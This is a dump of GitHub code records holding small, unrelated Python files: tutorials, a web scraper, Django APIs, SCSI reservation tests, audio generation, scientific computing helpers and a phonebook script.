plotter.show(window_size=window_size)","repo_name":"Nobregaigor/Project-Heart","sub_path":"project_heart/lv/modules/lv_metrics_3d_plotter.py","file_name":"lv_metrics_3d_plotter.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71455306612","text":"# STARTING WITH AN EMPTY DICTIONARY\n# It is sometimes convenient or even necessary to start with an empty\n# dictionary and then add each new item to it. Here is how to build a\n# dictionary using this approach:\n\nalien_0 = {}\n\nalien_0['color'] = 'green'\nalien_0['points'] = 5\n\nprint(alien_0)\n\n# TYPICALLY YOU'LL USE EMPTY DICTIONARIES WHEN STORING USER-SUPPLIED\n# DATA IN A DICTIONARY OR WHEN YOU WRITE CODE THAT GENERATES A LARGE\n# NUMBER OF KEY-VALUE PAIRS AUTOMATICALLY.\n\n","repo_name":"ctrlshftejct/pythoncc","sub_path":"2019/chapter6/alien_startingempty.py","file_name":"alien_startingempty.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30852315176","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom search import engine\nimport pickle\n\nclass Molecule:\n\tdef __init__(self, disease, drug_name, molecule_name, smiles):\n\t\tself.disease = disease\n\t\tself.drug_name = drug_name\n\t\tself.smiles = smiles\n\t\tself.molecule_name = molecule_name\n\t\treturn\n\ndef molecule_name_to_smiles(molecule_name):\n\tlink = \"https://www.ncbi.nlm.nih.gov/pccompound?term=\" + molecule_name.replace(' ', '%20')\n\tr = requests.get(link).content\n\tsoup = BeautifulSoup(r, 'html.parser')\n\tlink = soup.find('p', attrs={'class': 'title'})\n\tif link != None:\n\t\tfor i in link:\n\t\t\tsoup = BeautifulSoup(str(i))\n\t\t\tfor a in soup.find_all('a', href=True):\n\t\t\t\tlink = a['href'] + \"end\" \n\t\t\t\ts = link \n\t\t\t\tstart = 'compound/'\n\t\t\t\tend = 'end' \n\t\t\t\ts = s[s.find(start)+len(start):s.rfind(end)]\n\t\t\t\tlink = \"https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/\" + s + \"/property/CanonicalSMILES/txt\"\n\t\t\t\tsmiles = requests.get(link).text\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\treturn smiles \n\treturn \"\"\t\t\t\n\ndef extract_content(soup):\n\tlinks = soup.find_all('a', attrs={'class': 'ToggleDrugCategory'})\n\tdivs = soup.find_all('div', attrs={'class': 'CategoryListSection'}) \n\tresults = []\n\n\tfor i in range(0, len(links)):\n\t\tdisease_title = links[i].text\t\t\n\t\tfor j in divs[i].select(\"a\"):\n\t\t\tif \"/drug/\" in j[\"href\"]:\t\t\t\t\n\t\t\t\tdrug_name = j.text\n\t\t\t\tmolecule_name = drug_name[drug_name.find(\"(\")+1:drug_name.find(\")\")]\t\t\n\t\t\t\tsmiles = molecule_name_to_smiles(molecule_name)\n\t\t\t\tif smiles != \"\":\n\t\t\t\t\tmol = Molecule(disease=disease_title, drug_name=drug_name, molecule_name=molecule_name, smiles=smiles)\t\n\t\t\t\t\tresults.append(mol)\t\t\t\t\t\t\t\t\t\n\t\t\t\t\tprint(\"Created Molecule\")\t\t\t\t\t\t\t\t\t\t\n\treturn results\t\t\t\t\t\n\ndef scrape_letter(letter):\n\tlink = 'https://www.centerwatch.com/drug-information/fda-approved-drugs/medical-conditions/' + letter\n\tr = requests.get(link)\n\tcontent = r.text\n\tsoup = BeautifulSoup(content, \"html5lib\")\n\tresults = extract_content(soup)\n\treturn results\n\n'''\nres = []\nfor letter in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']:\n\tprint(\"Searching section\", letter)\n\tresult = scrape_letter(letter)\n\tfor i in result:\n\t\tres.append(i)\n\nwith open(\"RESULT.pkl\", 'wb') as output: \n\tprint \"Saving...\"\n\tpickle.dump(res, output)\t\nprint(\"script done!\")\t\t\n'''\n","repo_name":"michael13162/novogen","sub_path":"model/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3780273451","text":"def isApalindrome(str):\r\n startindex = 0\r\n endindex = len(str) - 1\r\n\r\n for x in str:\r\n if str[startindex] != str[endindex]:\r\n return False\r\n return True\r\n\r\nk = input('Enter a word to check palindrome or not: ')\r\nprint(isApalindrome(k))","repo_name":"ap4ashutosh/Meta_backend_development_python_course","sub_path":"21_Test_palindrome.py","file_name":"21_Test_palindrome.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74026129652","text":"import os\nimport subprocess\nfrom time import sleep\n\nfrom midiutil import MIDIFile\n\n\ntrack = 0\nchannel = 0\nstart_time = 0 # In beats\nduration = 1 # In beats\ntempo = 600 # In BPM\nvolume = 100 # 0-127, as per the MIDI standard\nmax_volume = 127\n\n\ndef newMidi(program):\n midi = MIDIFile(1) # One track\n midi.addTempo(track, start_time, tempo)\n midi.addProgramChange(track, channel, start_time, program)\n return midi\n\n\ndef generateSoundFile(midi, filepath, fade_start_sec, trim_sec, volume=1.0):\n with open('tmp.midi', 'wb') as output_file:\n midi.writeFile(output_file)\n subprocess.run(['timidity', 'tmp.midi', '-Ow', '-o', 'tmp.wav'],\n stdout=subprocess.DEVNULL)\n ffmpeg_command = ['ffmpeg', '-y', '-i', 'tmp.wav',\n '-af', 'volume={},afade=out:st={}:d={}'.format(\n volume, fade_start_sec, trim_sec - fade_start_sec),\n '-to', '{}'.format(trim_sec),\n filepath]\n print(' '.join(ffmpeg_command))\n subprocess.run(ffmpeg_command,\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n\n# C4 major scale: 60, 62, 64, 65, 67, 69, 71, 72\ndegrees = [\n [60],\n [64],\n [67],\n [72],\n [72, 76, 79],\n]\nmax_combo = len(degrees)\n\ntime_over_degrees = [60, 60]\nbonus_time_over_degrees = [60]\n\ntime_over_program = 28\ntime_over_volume_coeff = 2.0\n\nfor combo in range(0, max_combo):\n midi = newMidi(program=13)\n for note in degrees[combo]:\n midi.addNote(track, channel, note, start_time, duration, volume)\n generateSoundFile(midi,\n 'word_guessed_combo{:01}.ogg'.format(combo),\n fade_start_sec=0.9,\n trim_sec=1.0)\n\nmidi = newMidi(program=time_over_program)\ntime = 0\nfor note in time_over_degrees:\n time += 1\n midi.addNote(track, channel, note, time, duration, max_volume)\ngenerateSoundFile(midi,\n 'time_over.ogg',\n fade_start_sec=0.9,\n trim_sec=1.0,\n volume=time_over_volume_coeff)\n\nmidi = newMidi(program=time_over_program)\ntime = 0\nfor note in bonus_time_over_degrees:\n time += 1\n midi.addNote(track, channel, note, time, duration, max_volume)\ngenerateSoundFile(midi,\n 'bonus_time_over.ogg',\n fade_start_sec=0.9,\n trim_sec=1.0,\n volume=time_over_volume_coeff)\n\nos.remove('tmp.midi')\nos.remove('tmp.wav')\n\n# Melody test:\n#\n# beat_len = 10\n# midi = MIDIFile(1) # One track\n# midi.addTempo(track, time, tempo)\n# midi.addProgramChange(track, channel, time, program)\n# for combo in range(0, max_combo):\n# time = combo * beat_len\n# for note in degrees[combo]:\n# midi.addNote(track, channel, note, time, duration, volume)\n# turn_end = max_combo * beat_len + 4\n# midi.addProgramChange(track, channel, turn_end, end_program)\n# for combo in range(0, len(end_degrees)):\n# time = turn_end + combo * 20\n# for note in end_degrees[combo]:\n# midi.addNote(track, channel, note, time, duration, volume)\n# with open('tmp.mid', 'wb') as output_file:\n# midi.writeFile(output_file)\n# subprocess.run(['timidity', 'tmp.mid'], stdout=subprocess.DEVNULL)\n\n# Program test:\n#\n# for program in [4, 7, 10, 14, 15, 26, 41, 55, 96, 104, 112, 113, 115, 116]:\n# for program in range(0, 128):\n# print(program)\n# midi = MIDIFile(1)\n# midi.addTempo(track, time, tempo)\n# midi.addProgramChange(track, channel, time, program)\n# midi.addNote(track, channel, degrees[0][0], time, duration, volume)\n# with open('tmp.mid', 'wb') as output_file:\n# midi.writeFile(output_file)\n# subprocess.Popen(['timidity', 'tmp.mid'], stdout=subprocess.DEVNULL)\n# sleep(1)\n\n# Candidate programs: 8, 11, 12, 13, 112\n# Candidate for 'game over': 4, 7, 10, 14, 15, 26, 41, 55, 96, 104, 112, 113, 115*2, 116\n","repo_name":"amatveiakin/hat-game","sub_path":"tools/sound_gen/guessed_sound_gen.py","file_name":"guessed_sound_gen.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73233720694","text":"import json\nfrom django.http import HttpResponse\nfrom django_swagger_utils.drf_server.utils.decorator.interface_decorator \\\n import validate_decorator\nfrom .validator_class import ValidatorClass\nfrom content_management_portal.interactors.swap_hints_interactor import\\\n SwapHintsInteractor\nfrom content_management_portal.storages.hint_storage_implementation \\\n import HintStorageImplementation\nfrom content_management_portal.storages.question_storage_implementation \\\n import QuestionStorageImplementation\nfrom content_management_portal.presenters.presenter_implementation import\\\n PresenterImplementation\n\n\n@validate_decorator(validator_class=ValidatorClass)\ndef api_wrapper(*args, **kwargs):\n question_id = kwargs['question_id']\n hints_swap_details =kwargs['request_data']\n hint_storage = HintStorageImplementation()\n presenter = PresenterImplementation()\n question_storage = QuestionStorageImplementation()\n interactor = SwapHintsInteractor(\n hint_storage=hint_storage,\n presenter=presenter,\n question_storage=question_storage\n )\n response = interactor.swap_hints(\n question_id=question_id,\n hints_swap_details=hints_swap_details\n )\n json_response = json.dumps(response)\n return HttpResponse(json_response, status=200)\n","repo_name":"bammidichandini/content_management_portal","sub_path":"content_management_portal/views/swap_coding_question_hints/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6430897316","text":"#!/usr/bin/python\n\"\"\"\nPython tests for SCSI-3 Persistent Group Reservations\n\nDescription:\n This module tests Registration. See ... for more details.\n\"\"\"\n\n\n__author__ = \"Lee Duncan \"\n\n\nimport sys\nimport os\nfrom copy import copy\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\nfrom support.initiator import initA, initB, initC\nfrom support.setup import set_up_module\n\n################################################################\n\ndef setUpModule():\n \"\"\"Whole-module setup\"\"\"\n set_up_module(initA, initB, initC)\n\n################################################################\n\ndef my_reg_setup():\n \"\"\"make sure we are all setup to test reservations\"\"\"\n if initA.unregister() != 0:\n initA.unregister()\n if initB.unregister() != 0:\n initB.unregister()\n initC.runTur()\n\n################################################################\n\nclass test01CanRegisterTestCase(unittest.TestCase):\n \"\"\"Can register initiators\"\"\"\n\n def setUp(self):\n my_reg_setup()\n\n def testCanRegisterInitA(self):\n resA = initA.register()\n self.assertEqual(resA, 0)\n\n def testCanRegisterInitB(self):\n resB = initB.register()\n self.assertEqual(resB, 0)\n\n################################################################\n\nclass test02CanSeeRegistrationsTestCase(unittest.TestCase):\n \"\"\"Can see initiator registration\"\"\"\n\n def setUp(self):\n my_reg_setup()\n\n def testCanSeeNoRegistrations(self):\n registrantsA = initA.getRegistrants()\n self.assertEqual(len(registrantsA), 0)\n\n def testCanSeeRegistrationOnFirstRegistrant(self):\n res = initA.register()\n self.assertEqual(res, 0)\n res = initB.register()\n self.assertEqual(res, 0)\n registrantsA = initA.getRegistrants()\n self.assertEqual(len(registrantsA), 2)\n self.assertIn(initA.key, registrantsA)\n self.assertIn(initB.key, registrantsA)\n\n def testCanSeeRegOnSecondRegistrant(self):\n resA = initA.register()\n self.assertEqual(resA, 0)\n res = initB.register()\n self.assertEqual(res, 0)\n registrantsB = initB.getRegistrants()\n self.assertEqual(len(registrantsB), 2)\n self.assertIn(initA.key, registrantsB)\n self.assertIn(initB.key, registrantsB)\n\n def testCanSeeRegOnNonRegistrant(self):\n resA = initA.register()\n self.assertEqual(resA, 0)\n res = initB.register()\n self.assertEqual(res, 0)\n registrantsC = initC.getRegistrants()\n self.assertEqual(len(registrantsC), 2)\n self.assertIn(initA.key, registrantsC)\n self.assertIn(initB.key, registrantsC)\n\n################################################################\n\nclass test03CanUnregisterTestCase(unittest.TestCase):\n \"\"\"Can Unregister\"\"\"\n\n def setUp(self):\n my_reg_setup()\n initA.register()\n initB.register()\n\n def testCanUnregister(self):\n res = initA.unregister()\n self.assertEqual(res, 0)\n registrants = initA.getRegistrants()\n self.assertEqual(len(registrants), 1)\n res = initB.unregister()\n self.assertEqual(res, 0)\n registrants = initB.getRegistrants()\n self.assertEqual(len(registrants), 0)\n\n################################################################\n\nclass test04ReregistrationFailsTestCase(unittest.TestCase):\n \"\"\"Cannot reregister\"\"\"\n\n def setUp(self):\n my_reg_setup()\n initA.register()\n initB.register()\n\n def testReregisterFails(self):\n initAcopy = copy(initA)\n initAcopy.key = \"0x1\"\n resA = initAcopy.register()\n self.assertNotEqual(resA, 0)\n registrantsA = initA.getRegistrants()\n self.assertEqual(len(registrantsA), 2)\n self.assertIn(initA.key, registrantsA)\n self.assertIn(initB.key, registrantsA)\n\n################################################################\n\nclass test05RegisterAndIgnoreTestCase(unittest.TestCase):\n \"\"\"Can Register And Ignore\"\"\"\n\n def setUp(self):\n my_reg_setup()\n initA.register()\n initB.register()\n\n def testCanRegisterAndIgnore(self):\n # register with key \"0x1\"\n initAcopy = copy(initA)\n initAcopy.key = \"0x1\"\n result = initA.registerAndIgnore(initAcopy.key)\n self.assertEqual(result, 0)\n registrantsA = initAcopy.getRegistrants()\n self.assertNotIn(initA.key, registrantsA)\n self.assertIn(initAcopy.key, registrantsA)\n # re-register with normal key\n result = initAcopy.registerAndIgnore(initA.key)\n self.assertEqual(result, 0)\n registrantsA = initA.getRegistrants()\n self.assertNotIn(initAcopy.key, registrantsA)\n self.assertIn(initA.key, registrantsA)\n","repo_name":"gonzoleeman/open-iscsi-pgr-validate","sub_path":"tests/testRegister.py","file_name":"testRegister.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"40986362930","text":"MAGIC = b\"\\xDC\\xDC\\x0D\\x0A\\x1A\\x0A\\x00\"\n\n\ndef read(stream):\n head = stream.read(len(MAGIC) + 1)\n if len(head) != len(MAGIC) + 1 or head[: len(MAGIC)] != MAGIC:\n return False\n lenbyte = head[len(MAGIC)]\n is_uuid = lenbyte == 0\n length = 16 if is_uuid else lenbyte\n sig = stream.read(length)\n if len(sig) != length:\n return False\n return sig if is_uuid else sig.decode(\"utf-8\", errors=\"strict\")\n\n\ndef write(stream, name):\n if isinstance(name, bytes):\n assert len(name) == 16\n sig = name\n is_uuid = True\n else:\n assert isinstance(name, str)\n sig = name.encode(\"utf-8\", errors=\"strict\")\n is_uuid = False\n stream.write(MAGIC)\n stream.write(bytes([0 if is_uuid else len(sig)]))\n stream.write(sig)\n","repo_name":"unisig/lib","sub_path":"python-3/unisig.py","file_name":"unisig.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73995861172","text":"#!/usr/bin/env python\r\n# importing required modules\r\nimport PyPDF2\r\n###\r\ndef PDFmerge(pdfs, output):\r\n # creating pdf file merger object\r\n pdfMerger = PyPDF2.PdfFileMerger()\r\n\r\n # appending pdfs one by one\r\n for pdf in pdfs:\r\n with open(pdf, 'rb') as f:\r\n pdfMerger.append(f)\r\n\r\n # writing combined pdf to output pdf file\r\n with open(output, 'wb') as f:\r\n pdfMerger.write(f)\r\n\r\ndef main():\r\n # pdf files to merge\r\n pdfs = ['2018 CFA ENV UI 18-15211.pdf', '2018 CFA ENV PU 18-15211.pdf']\r\n\r\n # output pdf file name\r\n output = '2018 CFA ENV 18-15211.pdf'\r\n\r\n # calling pdf merge function\r\n PDFmerge(pdfs = pdfs, output = output)\r\n\r\nif __name__ == \"__main__\":\r\n # calling the main function\r\n main()\r\n# EOF\r\n","repo_name":"TheDoctorRAB/utilities","sub_path":"python-util/merge.pdf.py","file_name":"merge.pdf.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30084519320","text":"import numpy as np\n\ndef matReg(y,u,ny,nu):\n # for debuging code\n # y= np.array([1, 2, 3,4,5,6,7,8,9,10])\n # u= np.array([1, 2, 3,4,5,6,7,8,9,10])\n\n p = np.max((ny,nu)) + 1\n (N,) = y.shape\n (Nu,) = u.shape\n \n # sanity check\n if N != Nu:\n print('Dimensions of u and y vector are not consistent')\n return (-1,-1)\n \n # create target vector\n target = y[p-1:N]\n\n # create regression matrix\n Phi = np.zeros((N-p+1,ny+nu))\n for i in range(ny):\n Phi[:,i] = y[p-i-2: N - i-1].reshape(-1)\n\n for i in range(nu):\n Phi[:,i+ny] = u[p-i-2: N - i-1].reshape(-1)\n\n return (target, Phi)\n\ndef freeRun(model, y, u,ny,nu):\n p = max(ny,nu) + 1 \n (N,) = y.shape\n\n yhat = np.zeros(N)\n yhat[:p-1] = y[:p-1].reshape(-1) # include initial conditions\n\n for k in range(p,N+1):\n # print(k)\n auxY = np.concatenate(( yhat[(k-p):(k-1)].reshape(-1) , (0,) ),axis=0)\n auxU = np.concatenate(( u [(k-p):(k-1)].reshape(-1) , (0,) ),axis=0)\n \n _,fr_input = matReg(auxY,auxU,ny,nu)\n yhat[k-1] = model.predict(fr_input)\n # return only the values that are predictions\n # (remove the initial conditions)\n return yhat[-(N-p+1):] ","repo_name":"prj-phcp/SYSID_Atividades","sub_path":"Atividade09/sysid_utils.py","file_name":"sysid_utils.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33177432815","text":"\"\"\"\nGET, POST\n取得所有文章: 取得所有資料,輸出結構如下:{ id, url_id, title, date, content}\n取得單一文章: 提供id,輸出結構如下:{ id, url_id, title, date, content}\n新增: 要提供 title, date(確認是否為日期格式), content; url_id使用/Popular/Detail/+序號, id自行產生\n\nPUT\n修改: 提供id(確認是否是數字), 可修改title or date(確認是否為日期格式) or content\n\nDELETE\n刪除: 使用id刪除,提供aip id(確認是否是數字)\n\"\"\"\n\n\nfrom django.shortcuts import render\nfrom .serializers import NewsModelSerializer\nfrom django.http import JsonResponse\nfrom django.http.response import JsonResponse\nfrom rest_framework.parsers import JSONParser \nfrom rest_framework import status\nfrom rest_framework.decorators import api_view, permission_classes\nfrom .models import News\nfrom rest_framework.permissions import IsAuthenticated\n\n\n\n@api_view(['GET', 'POST'])\n@permission_classes([IsAuthenticated])\ndef dailyview_list(request):\n\n if request.method == 'GET':\n \n news_lst = News.objects.all()\n news_serializer = NewsModelSerializer(news_lst, many=True)\n return JsonResponse(news_serializer.data, safe=False)\n \n elif request.method == 'POST':\n news_data = JSONParser().parse(request)\n news_serializer = NewsModelSerializer(data=news_data)\n if news_serializer.is_valid():\n news_serializer.save()\n return JsonResponse(news_serializer.data, status=status.HTTP_201_CREATED) \n return JsonResponse(news_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n\n@api_view(['GET', 'PUT', 'DELETE'])\n@permission_classes((IsAuthenticated, ))\ndef dailyview_detail(request, pk):\n\n # print('request', request)\n # print('pk', pk)\n try: \n news_item = News.objects.get(pk=pk) \n except News.DoesNotExist: \n return JsonResponse({'message': '熱門新聞沒有此篇文章'}, status=status.HTTP_404_NOT_FOUND) \n \n if request.method == 'GET': \n news_serializer = NewsModelSerializer(news_item) \n return JsonResponse(news_serializer.data) \n \n elif request.method == 'PUT': \n news_data = JSONParser().parse(request) \n print('news_data', news_data)\n print('news_itme', news_item)\n news_serializer = NewsModelSerializer(news_item, data=news_data, partial=True) \n if news_serializer.is_valid():\n news_serializer.save() \n return JsonResponse(news_serializer.data) \n return JsonResponse(news_serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n \n elif request.method == 'DELETE': \n news_item.delete() \n return JsonResponse({'message': '此篇文章已被刪除!'}, status=status.HTTP_204_NO_CONTENT)\n\n\n\n\n\n\n\n","repo_name":"wu0up/DV_project","sub_path":"hot_news_project/myproject/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40509062700","text":"from euler.big_int import BigInt\n\n\ndef compute() -> BigInt:\n number = BigInt(138_902_663)\n j = 3\n while not all((number * number)[i * 2] == str(i + 1) for i in range(9)):\n if j == 3:\n number -= 6\n j = 7\n else:\n number -= 4\n j = 3\n return number * 10\n","repo_name":"Dynortice/Project-Euler","sub_path":"problems/0206/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41051202781","text":"from ariadne import make_executable_schema\nfrom ariadne import QueryType\nfrom guillotina.catalog.utils import get_index_fields\nfrom guillotina.component import get_utilities_for\nfrom guillotina.interfaces import IResourceFactory\nfrom guillotina_graphql.mappings import CATALOG_TO_GRAPHQL_MAPPING\nfrom guillotina_graphql.mappings import FIELD_DIRECTIVES_TO_GRAPHQL\n\nquery = QueryType()\ngraphql_schema = None\n\n\ndef build_graphql_schema():\n global graphql_schema\n\n graphql_schema = make_executable_schema(get_type_defs(), query)\n\n\ndef _iter_model_indices():\n for type_name, schema in get_utilities_for(IResourceFactory):\n for field_name, catalog_info in get_index_fields(type_name).items():\n if field_name in FIELD_DIRECTIVES_TO_GRAPHQL:\n yield type_name, field_name, {\n \"gql_type\": FIELD_DIRECTIVES_TO_GRAPHQL[field_name]\n }\n else:\n yield type_name, field_name, catalog_info\n\n\ndef _get_model_fields_and_types():\n # TODO: cache result?\n result_types = {}\n for model, field, directive in _iter_model_indices():\n if model not in result_types:\n result_types[model] = {}\n\n index_name = directive.get(\"index_name\") or field\n type_ = directive.get(\"gql_type\")\n if not type_:\n type_ = CATALOG_TO_GRAPHQL_MAPPING[directive[\"type\"]]\n\n result_types[model][index_name] = {\"type\": type_}\n return result_types\n\n\ndef dict_types_to_graphql_str(dict):\n return \"\\n \".join(f\"{field}: {value['type']}\" for field, value in dict.items())\n\n\ndef _get_input_search_query():\n result_types = _get_model_fields_and_types()\n search_query_fields = {}\n for model in result_types:\n for index_name, directive in result_types[model].items():\n search_query_fields[index_name] = directive\n\n search_query_raw = \"\\n \".join(\n f\"{field}: {value['type']}\"\n if \"default\" not in value\n else f\"{field}: {value['type']} = {value['default']}\"\n for field, value in search_query_fields.items()\n )\n return f\"\"\"\ninput SearchQuery {{\n _size: Int = 10\n {search_query_raw}\n}}\n\"\"\"\n\n\ndef _get_models():\n result_types = _get_model_fields_and_types()\n\n model_types = []\n for model, types in result_types.items():\n model_types += [\n f\"\"\"\ntype {model} implements IItem {{\n {dict_types_to_graphql_str(types)}\n}}\"\"\"\n ]\n model_types_str = \"\\n\".join(model_types)\n\n schema = f\"\"\"\ninterface IItem {{\n {dict_types_to_graphql_str(result_types['Item'])}\n}}\n\n{model_types_str}\n\nunion SearchResult = {\" | \".join(result_types)}\n\"\"\"\n return schema\n\n\ndef get_type_defs():\n return f\"\"\"\n{_get_input_search_query()}\n\n{_get_models()}\n\ntype Query {{\n search(query: SearchQuery): [SearchResult]\n}}\n\"\"\"\n","repo_name":"masipcat/guillotina_graphql","sub_path":"guillotina_graphql/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24231792085","text":"from project_utilities import *\nimport numba\nimport numpy as np\n\n@numba.njit(parallel = True)\ndef electronic_energy_numba(occs,vecs,H0):\n E = 0\n for a in range(len(occs)):\n for u in range(len(vecs)):\n for v in range(len(vecs)):\n E += occs[a]*vecs[u,a]*vecs[v,a]*H0[u,v]\n return E\n\ndef electronic_energy(occs,C,H0):\n return electronic_energy_numba(occs,C,H0)\n\ndef coulombE(mol,gamma,charges):\n atoms = mol.atom_numbers()\n E = 0\n for i in range(len(atoms)):\n for j in range(len(atoms)):\n E+=charges[i]*gamma[i,j]*charges[j]\n return (1/2)*E\n\n@numba.njit(parallel = True)\ndef numba_charce_calc(atoms,coeffs,occupations,S,mapping,num_H = 1,num_O = 4,num_S = 9):\n charges = np.zeros(len(atoms),dtype = np.float64)\n C = coeffs.copy()\n electrons = np.array([0,1,2,1,2,3,4,5,6,7,8,1,2,3,4,5,6,7,8])\n num_elec = np.zeros(len(atoms))\n number_of_pairs = 0\n for i in occupations:\n number_of_pairs += i\n number_of_pairs /= 2\n number_of_pairs = int(number_of_pairs)\n for i in range(len(atoms)):\n index = atoms[i]\n num_elec[i] = electrons[index]\n for j in range(len(atoms)):\n offset = 0\n for i in range(j):\n offset += mapping[atoms[i]]\n ranging = np.array([offset,offset + mapping[atoms[j]]])\n for i in range(number_of_pairs):\n for u in range(ranging[0],ranging[1]):\n for v in range(S.shape[0]):\n a = occupations[i]*(C[u,i]*S[u,v]*C[v,i] + C[v,i]*S[v,u]*C[u,i])\n charges[j] += a\n return num_elec - (1/2)*charges\n\ndef charge_calc(mol,coeffs,occupations,S,num_H = 1,num_O = 4,num_S = 9):\n mapping = [0,num_H,num_H,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_S,num_S,num_S,num_S,num_S,num_S,num_S,num_S]\n mapping = np.array([int(x) for x in mapping])\n atoms = mol.atom_numbers()\n atoms = np.array([int(x) for x in atoms])\n occupations = np.array([int(x) for x in occupations])\n return numba_charce_calc(atoms,coeffs,occupations,S,mapping,num_H = num_H,num_O = num_O,num_S = num_S)\n\n@numba.njit(parallel = True)\ndef numba_hamiltonian(atoms,charges,gamma,mapping,S):\n corrected = np.zeros(gamma.shape)\n for i in range(gamma.shape[0]):\n for j in range(gamma.shape[1]):\n for a in range(charges.shape[0]):\n corrected[i,j] += (gamma[i,a] + gamma[j,a])*charges[a]\n corrected2 = np.zeros(S.shape)\n for j in range(len(atoms)):\n offset = 0\n for i in range(j):\n offset += mapping[atoms[i]]\n ranging = np.array([offset,offset + mapping[atoms[j]]])\n for i in range(len(atoms)):\n if i >= j:\n offset = 0\n for k in range(i):\n offset += mapping[atoms[k]]\n ranging2 = np.array([offset,offset + mapping[atoms[i]]])\n corrected2[ranging[0]:ranging[1],ranging2[0]:ranging2[1]] = corrected[i,j]\n corrected2[ranging2[0]:ranging2[1],ranging[0]:ranging[1]] = corrected[j,i]\n return corrected2\n\ndef hamiltonian(mol,H0,S,charges,gamma,num_H = 1,num_O = 4,num_S = 9):\n atoms = mol.atom_numbers()\n atoms = np.array([int(x) for x in atoms])\n mapping = [0,num_H,num_H,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_S,num_S,num_S,num_S,num_S,num_S,num_S,num_S]\n mapping = np.array([int(x) for x in mapping])\n corrected = numba_hamiltonian(atoms,charges,gamma,mapping,S)\n corrected = H0 - (1/2)*S*corrected\n return corrected\n\ndef SCC(mol,occupations,H0,S,gamma,num_H = 1,num_O = 4,num_S = 9,iterations = 10,charge = [None]):\n charges = np.zeros((iterations,len(mol.atoms)))\n energies = np.zeros(iterations)\n H = H0.copy()\n if charge[0] != None:\n H = hamiltonian(mol,H0,S,charge,gamma,num_H = num_H,num_O = num_O,num_S = num_S)\n for i in range(iterations):\n eigs,vecs = eig(np.linalg.inv(S)@ H)\n SB = vecs.T @ S @ vecs\n norm_vecs = normalize(vecs,SB)\n charge = charge_calc(mol,norm_vecs,occupations,S,num_H = num_H,num_O = num_O,num_S = num_S)\n charges[i] = charge\n energies[i] = coulombE(mol,gamma,charge)\n H = hamiltonian(mol,H0,S,charge,gamma,num_H = num_H,num_O = num_O,num_S = num_S)\n return charges,energies\n","repo_name":"tobyvg/master_project_scripts","sub_path":"Some_scripts/dftb.py","file_name":"dftb.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21661725824","text":"a = []\r\nb = []\r\n\r\n\r\nclass contact:\r\n def __init__(self, name, number,):\r\n self.name = name\r\n self.number = number\r\n\r\n def write_contact(self):\r\n f1 = open(\"phonebook.txt\", \"a\")\r\n f1.write(self.name)\r\n f1.write(\"\\n\")\r\n f1.write(self.number)\r\n f1.write(\"\\n\")\r\n f1.close()\r\n\r\n def read_contact(self):\r\n f2 = open(\"phonebook.txt\", \"r\")\r\n self.name = f2.read()\r\n print(self.name)\r\n f2.close()\r\n\r\n\r\nn = int(input(\"How many inputs you want to insert inside the file: \"))\r\ni = 0\r\nwhile(i < n):\r\n name = str(input(\"Enter the name of contact: \"))\r\n number = str(input(\"Enter the phone number of the person: \"))\r\n cont = contact(name, number)\r\n write = cont.write_contact()\r\n i += 1\r\nread = cont.read_contact()\r\nf = open(\"phonebook.txt\", \"r\")\r\nap = f.readlines()\r\nf.close()\r\nprint(ap)\r\nnw1 = []\r\nnw2 = []\r\nfor i in range(len(ap)):\r\n nw1.append(ap[i])\r\n nw1 = \"\".join(nw1)\r\n nw1 = list(nw1)\r\n nw1.remove('\\n')\r\n j = 0\r\n while (j < len(nw1)):\r\n if(len(nw1[j]) == 1):\r\n nw1[j: len(nw1)] = [\"\".join(nw1[j: len(nw1)])]\r\n nw2.append(nw1[j])\r\n j += 1\r\n nw1 = []\r\nprint(nw2)\r\nfor 